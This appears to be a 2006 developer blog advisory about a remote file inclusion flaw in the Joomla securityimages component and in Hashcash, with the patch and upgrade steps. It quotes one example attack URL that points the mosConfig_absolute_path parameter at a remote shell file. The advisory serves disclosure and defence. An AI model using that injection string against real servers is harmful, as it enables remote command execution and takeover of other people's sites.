Select Page

Security risk in securityimages

Posted by | Aug 1, 2006 | | 0 |

Security risk in securityimages
| joomla securityimages

The webmaster of janwiersma.com sent me an email today
at 6:12AM , his server was hacked because of a bug in
securityimages. This bug allows a remote atacker to
execute commands via remote forceful include and
execute function on your server
and affect ALL version of securityimages <= 3.0.5

Here are all files which put your server at risk:
client.php, configinsert.php, lang.php, server.php

Example of attack:
http://web/components/com_securityimages/
configinsert.php?mosConfig_absolute_path=http://shell.txt
from http://securityreason.com/exploitalert/892
Secunia has also a report on it: http://secunia.com/product/11186/

In fact I forget to use that line in these files:
defined(‘_VALID_MOS’) or die(‘Direct Access to this location is not allowed.’);
This avoid any requests to access directly this file. 

– upgrade to 3.0.6 (download at #Joomla Forge or in my download sections) OR
– patch the faulty files by hand (add defined(‘_VALID_MOS’) or die(‘Direct Access to this location is not allowed.’); at the beginning of each file)

Please also contact all Your friends which are using securityimages!

And for my other components?

Hashcash 1.2.X is also affected: http://secunia.com/product/11046/  and my patch is avalaible!

– upgrade to 1.2.2  (download at #Joomla Forge or in my download sections) OR
– patch the faulty files by hand (add defined(‘_VALID_MOS’) or die(‘Direct Access to this location is not allowed.’); at the beginning of each file)

JoomlaCloud is NOT affected

YOU ARE ALL URGE TO UPGRADE ASAP!

You Might Also Like:

new project on mamboforge: Hashcash

cedThumbnails

cedThumbnails 2.6.1 for Joomla 2.5 will be soon available

cedThumbnails

cedThumbnails 2.5.7 for J2.5 Released

Rate:

About The Author

I worked with various Insurances companies across Switzerland on online applications handling billion premium volumes. I love to continuously spark my creativity in many different and challenging open-source projects fueled by my great passion for innovation and blockchain technology.In my technical role as a senior software engineer and Blockchain consultant, I help to define and implement innovative solutions in the scope of both blockchain and traditional products, solutions, and services. I can support the full spectrum of software development activities, starting from analyzing ideas and business cases and up to the production deployment of the solutions.I'm the Founder and CEO of Disruptr GmbH.

Related Posts

Hello spammer

Hello spammer

August 9, 2005

Module Nimbus for Joomla! Tags of Phil Taylor

Module Nimbus for Joomla! Tags of Phil Taylor

December 10, 2009

Smugmug/picasa/flickr extensions for Joomla! now available at JED

Smugmug/picasa/flickr extensions for Joomla! now available at JED

June 29, 2009

new Project om Mamboforge

new Project om Mamboforge

March 5, 2005

Categories